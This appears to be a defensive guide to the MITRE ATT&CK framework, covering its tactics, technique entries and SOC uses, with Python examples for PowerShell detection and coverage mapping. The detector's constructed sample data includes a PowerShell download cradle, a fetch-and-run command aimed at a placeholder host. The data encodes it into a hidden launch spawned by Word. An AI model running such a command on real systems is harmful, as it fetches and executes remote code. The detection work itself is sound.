MITRE ATT&CK® Framework
A globally accessible knowledge base of adversary tactics, techniques and procedures (TTPs) based on real-world observations. Use it to drive threat-informed defence, detection engineering, and red/blue/purple teaming.
What is MITRE ATT&CK?
MITRE ATT&CK® (Adversarial Tactics, Techniques & Common Knowledge) is a curated repository of adversary behaviour mapped across the attack lifecycle. Each entry documents how attackers operate, which systems they target, and how defenders can detect or mitigate their actions.
- Enterprise Matrix: Windows, macOS, Linux, cloud, network, and container techniques.
- Mobile Matrix: Android & iOS threats.
- ICS Matrix: Industrial control system TTPs.
Enterprise Tactics
ATT&CK Enterprise defines 14 tactics, each naming the adversary's goal at one stage of an intrusion. Techniques and sub-techniques sit under one or more tactics: T1053 Scheduled Task/Job, for example, is listed under Execution, Persistence and Privilege Escalation because it serves all three goals. Each tactic is listed below with its ID and a representative technique.
- Reconnaissance (TA0043): gather information to plan the operation, e.g. T1595 Active Scanning.
- Resource Development (TA0042): build or buy infrastructure and capabilities, e.g. T1583 Acquire Infrastructure.
- Initial Access (TA0001): gain a first foothold, e.g. T1566 Phishing, T1078 Valid Accounts.
- Execution (TA0002): run attacker-controlled code, e.g. T1059 Command and Scripting Interpreter.
- Persistence (TA0003): survive reboots and credential changes, e.g. T1547 Boot or Logon Autostart Execution.
- Privilege Escalation (TA0004): obtain higher permissions, e.g. T1548 Abuse Elevation Control Mechanism.
- Defence Evasion (TA0005): avoid detection, e.g. T1027 Obfuscated Files or Information, T1070 Indicator Removal.
- Credential Access (TA0006): steal account names and secrets, e.g. T1003 OS Credential Dumping.
- Discovery (TA0007): learn the environment, e.g. T1082 System Information Discovery, T1087 Account Discovery.
- Lateral Movement (TA0008): move between systems, e.g. T1021 Remote Services.
- Collection (TA0009): gather data of interest, e.g. T1005 Data from Local System.
- Command and Control (TA0011): communicate with compromised systems, e.g. T1071 Application Layer Protocol.
- Exfiltration (TA0010): steal data out of the environment, e.g. T1041 Exfiltration Over C2 Channel.
- Impact (TA0040): manipulate, interrupt or destroy systems and data, e.g. T1486 Data Encrypted for Impact.
Anatomy of a Technique Entry
- Technique ID: e.g., T1059 (Command and Scripting Interpreter). Sub-techniques extend the parent ID, e.g., T1059.001 (PowerShell); tactics carry TA IDs, groups G IDs, software S IDs and mitigations M IDs.
- Tactics and Platforms: the tactic(s) the technique serves and the platforms it applies to (Windows, Linux, macOS, cloud, and so on).
- Description: What the technique does and why attackers use it.
- Procedure Examples: Cited, real-world observations of threat groups or software using the technique.
- Mitigations: Defensive recommendations such as least privilege or application control, each referencing a mitigation entry (e.g., M1038 Execution Prevention).
- Detections: For each relevant data component, what to look for and analytic ideas (e.g., process-creation telemetry such as Sysmon Event ID 1 or Windows Security Event ID 4688 to catch unusual interpreter launches).
- Data Sources: Specific telemetry named as data source and data component pairs (Process: Process Creation, Command: Command Execution, Script: Script Execution, WMI: WMI Creation, etc.).
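To make the Detections and Data Sources fields concrete, the following is an added example (not code from MITRE or from any product) of detection logic for T1059.001 (PowerShell) run over process-creation telemetry. The input records are constructed here to resemble the fields Sysmon Event ID 1 emits (Image, ParentImage, CommandLine, User); the `-e`/`-enc` prefix handling and the Office parent list are heuristics chosen for this example, not an ATT&CK-defined rule.

```python
"""T1059.001 detection over constructed Sysmon Event ID 1 (process creation) records.

Added example; the records below are CONSTRUCTED, not captured telemetry.
"""
import base64
import re

T_POWERSHELL = "T1059.001"      # Command and Scripting Interpreter: PowerShell
T_USER_EXEC_FILE = "T1204.002"  # User Execution: Malicious File (Office parent)

# Office binaries that should rarely spawn an interpreter (heuristic list for this example)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" followed by a long base64-looking argument and verify by decoding.
ENCODED_FLAG = re.compile(r"(?i)\s-e\w*\s+([A-Za-z0-9+/=]{16,})")


def _b64_utf16(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed payload: a typical download cradle. example.invalid never resolves.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

SAMPLE_EVENTS = [  # constructed Sysmon-style records
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + _b64_utf16(PAYLOAD),
     "User": r"CORP\alice"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
     "User": r"CORP\bob"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 3,  # network connection event: not process creation, ignored
     "Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\SYSTEM"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # looked like -e<...> but the argument is not a UTF-16LE base64 blob


def analyse_event(event: dict):
    """Evaluate one record; return an alert dict tagged with technique IDs, or None."""
    if event.get("EventID") != 1:
        return None
    if basename(event.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    techniques, findings = [T_POWERSHELL], []
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is not None:
        findings.append("encoded command line")
    parent = basename(event.get("ParentImage", ""))
    if parent in OFFICE_PARENTS:
        techniques.append(T_USER_EXEC_FILE)
        findings.append(f"spawned by Office process {parent}")
    if not findings:
        return None  # plain PowerShell launches are too noisy to alert on by themselves
    return {"user": event.get("User"), "techniques": techniques,
            "findings": findings, "decoded_command": decoded}


def run_detections(events):
    """Apply analyse_event to every record and keep the alerts."""
    return [alert for alert in (analyse_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert["user"], alert["techniques"], alert["findings"])
        print("  decoded:", alert["decoded_command"])
```

Only the Word-spawned, encoded launch alerts; the administrator's `-ExecutionPolicy Bypass -File` run is recorded as T1059.001 telemetry but produces no alert, which is the trade-off the Detections field of a technique entry is meant to inform.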
Applying ATT&CK in the SOC
Detection Engineering
- Map existing detections to ATT&CK techniques to identify coverage gaps.
- Build detection-as-code with every rule tagged by technique ID (e.g., Sigma `attack.t1059.001` tags, or metadata fields in YARA-L and Kusto rules) so coverage can be computed from the rule repository.
- Use MITRE ATT&CK Navigator layers to visualise detection maturity.
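The three bullets above are one workflow: read technique tags off the rules, count rules per technique, compare against the techniques you need to cover, and emit a Navigator layer. The following added example (not code from MITRE, the Navigator project or any SIEM vendor) does that end to end. The rules are constructed Sigma-style metadata (title plus `tags`); a real run would load the `tags:` key of each YAML rule in the repository, and the `REQUIRED` list stands in for a threat profile you would derive from your own CTI. The Navigator and ATT&CK version strings are assumptions; set them to the versions you actually use.

```python
"""Compute detection coverage per ATT&CK technique and emit a Navigator layer.

Added example; RULES and REQUIRED are CONSTRUCTED inputs, not a real rule set.
"""
import json
import re
from collections import Counter

# Sigma convention: "attack.<tactic>" tags and "attack.t1234" / "attack.t1234.001" tags.
TECHNIQUE_TAG = re.compile(r"^attack\.(t\d{4}(?:\.\d{3})?)$", re.IGNORECASE)

RULES = [  # constructed Sigma-style rule metadata
    {"title": "Encoded PowerShell Command Line",
     "tags": ["attack.execution", "attack.t1059.001", "attack.defense_evasion", "attack.t1027"]},
    {"title": "Office Application Spawning Shell",
     "tags": ["attack.execution", "attack.t1059.001", "attack.t1204.002"]},
    {"title": "LSASS Memory Access",
     "tags": ["attack.credential_access", "attack.t1003.001"]},
    {"title": "Kerberos Service Ticket Request Spike",
     "tags": ["attack.credential_access", "attack.t1558.003"]},
    {"title": "Scheduled Task Creation",
     "tags": ["attack.persistence", "attack.t1053.005"]},
]

# Constructed threat profile: techniques a CTI team decided must be covered.
REQUIRED = ["T1059.001", "T1003.001", "T1021.001", "T1486", "T1053.005", "T1566.001"]


def techniques_from_tags(tags):
    """Extract normalised technique IDs (T1234 or T1234.001) from Sigma tags."""
    ids = []
    for tag in tags:
        m = TECHNIQUE_TAG.match(tag)
        if m:
            ids.append(m.group(1).upper())
    return ids


def coverage(rules) -> Counter:
    """Number of distinct rules that reference each technique."""
    counts = Counter()
    for rule in rules:
        for tid in set(techniques_from_tags(rule["tags"])):  # one rule counts once per technique
            counts[tid] += 1
    return counts


def coverage_gaps(required, counts):
    """Required techniques with no rule at all, sorted for stable reporting."""
    return sorted(t for t in required if counts.get(t, 0) == 0)


def build_layer(counts, required, name="Detection coverage"):
    """Build an ATT&CK Navigator layer (layer format 4.5) scored by rule count.

    Required-but-uncovered techniques are included with score 0 so they render
    in the gradient's lowest colour and carry a GAP comment.
    """
    techniques = []
    for tid in sorted(set(counts) | set(required)):
        n = counts.get(tid, 0)
        techniques.append({
            "techniqueID": tid,
            "score": n,
            "comment": f"{n} rule(s)" if n else "GAP: required by threat profile, no detection",
            "enabled": True,
            "showSubtechniques": True,
        })
    return {
        "name": name,
        # Assumed version strings; align with your Navigator / ATT&CK release.
        "versions": {"attack": "15", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Rules per technique from the detection repository; 0 = required gap",
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"],
                     "minValue": 0, "maxValue": max(counts.values(), default=1)},
        "techniques": techniques,
    }


if __name__ == "__main__":
    counts = coverage(RULES)
    print("gaps:", coverage_gaps(REQUIRED, counts))
    print(json.dumps(build_layer(counts, REQUIRED), indent=2))
```

Load the printed JSON into ATT&CK Navigator via Open Existing Layer; the gradient colours techniques by rule count and the score-0 entries show where the threat profile has no detection. Because the layer is derived from the rule repository, regenerating it in CI keeps the coverage picture honest as rules are added or retired.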
Threat Hunting & IR
- Investigate alerts by correlating related techniques (parent/child processes, C2 patterns).
- Develop hunt hypotheses aligned to specific tactics (e.g., search for Credential Access behaviour).
- Create playbooks for incident response containing relevant techniques and mitigations.
Red/Purple Teaming
- Plan offensive simulations referencing ATT&CK techniques for realistic tradecraft.
- Measure defensive response per technique to improve detection/response loops.
- Use CALDERA, Atomic Red Team, or Prelude Operator to emulate ATT&CK techniques.
Risk & Compliance
- Map ATT&CK techniques to control frameworks (NIST SP 800-53, ISO/IEC 27001, CIS Controls v8) so each control can be justified by the techniques it mitigates.
- Report kill-chain coverage to leadership using ATT&CK matrices.
- Prioritise investments based on techniques most used against your sector.
ATT&CK Data Sources
ATT&CK enumerates recommended data sources for each technique. Common examples:
- Process, command-line, and PowerShell logging (Sysmon, Windows Event Logs).
- Authentication logs (Active Directory, Microsoft Entra ID (formerly Azure AD), Okta).
- Network traffic (NetFlow, Zeek, firewall/proxy logs).
- Cloud logs (AWS CloudTrail, Azure Activity Log, Google Cloud Audit Logs).
- Application logs (VPN concentrators, SaaS platforms, database audit logs).
- Endpoint telemetry (EDR, memory forensics, registry/file monitoring).
Tools for Working with ATT&CK
- ATT&CK Navigator – Create layers highlighting coverage, gaps, threat intel.
- Center for Threat-Informed Defense (CTID) projects, e.g. Mappings Explorer for control-framework-to-ATT&CK mappings and Attack Flow for describing technique sequences observed in incidents.
- Atomic Red Team – Small tests mapped to ATT&CK techniques.
- MITRE CALDERA – Automated adversary emulation platform.
- BloodHound – Visualise AD attack paths; the edges correspond to ATT&CK Credential Access and Lateral Movement techniques (e.g., T1558 Steal or Forge Kerberos Tickets, T1021 Remote Services), which makes the graph useful for prioritising detections.